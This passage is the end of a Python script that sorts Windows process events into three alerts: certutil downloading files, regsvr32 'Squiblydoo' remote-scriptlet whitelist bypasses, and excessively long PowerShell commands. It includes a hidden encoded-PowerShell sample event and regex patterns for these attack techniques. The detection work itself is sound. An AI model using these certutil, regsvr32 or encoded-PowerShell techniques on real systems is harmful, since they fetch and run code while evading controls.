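    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoP -W Hidden -EncodedCommand " + "QUJD" * 300),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
]

URL = re.compile(r"https?://", re.IGNORECASE)
CERTUTIL_FETCH = re.compile(r"-(urlcache|verifyctl)\b", re.IGNORECASE)
REGSVR32_REMOTE_SCRIPT = re.compile(r"/i:\S*https?://", re.IGNORECASE)
LONG_POWERSHELL = 1000  # assumed threshold in characters; tune to your environment


def image_name(event: ProcessEvent) -> str:
    """Lower-cased file name of the process image."""
    return event.image.rsplit("\\", 1)[-1].lower()


def detect(event: ProcessEvent) -> list:
    """Return the names of the roundup alerts this event would raise (possibly none)."""
    name, cmd = image_name(event), event.command_line
    alerts = []
    # certutil normally handles certificates; a URL plus a fetch switch is a download.
    if name == "certutil.exe" and URL.search(cmd) and CERTUTIL_FETCH.search(cmd):
        alerts.append("Certutil.exe is downloading a file")
    # Squiblydoo: regsvr32 pointed at remote script content through the scriptlet COM object.
    if name == "regsvr32.exe" and (REGSVR32_REMOTE_SCRIPT.search(cmd) or "scrobj.dll" in cmd.lower()):
        alerts.append("Squiblydoo application whitelist bypass attempt detected")
    # Very long command lines usually carry an encoded or obfuscated script body.
    if name in ("powershell.exe", "pwsh.exe") and len(cmd) > LONG_POWERSHELL:
        alerts.append("Excessively long PowerShell command detected")
    return alerts


def triage(events) -> dict:
    """Count alerts by name, the same shape as the '(count)' figures in the list above."""
    counts = Counter()
    for event in events:
        counts.update(detect(event))
    return dict(counts)


if __name__ == "__main__":
    for alert, count in triage(EVENTS).items():
        print(f"{alert} - ({count})")
```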
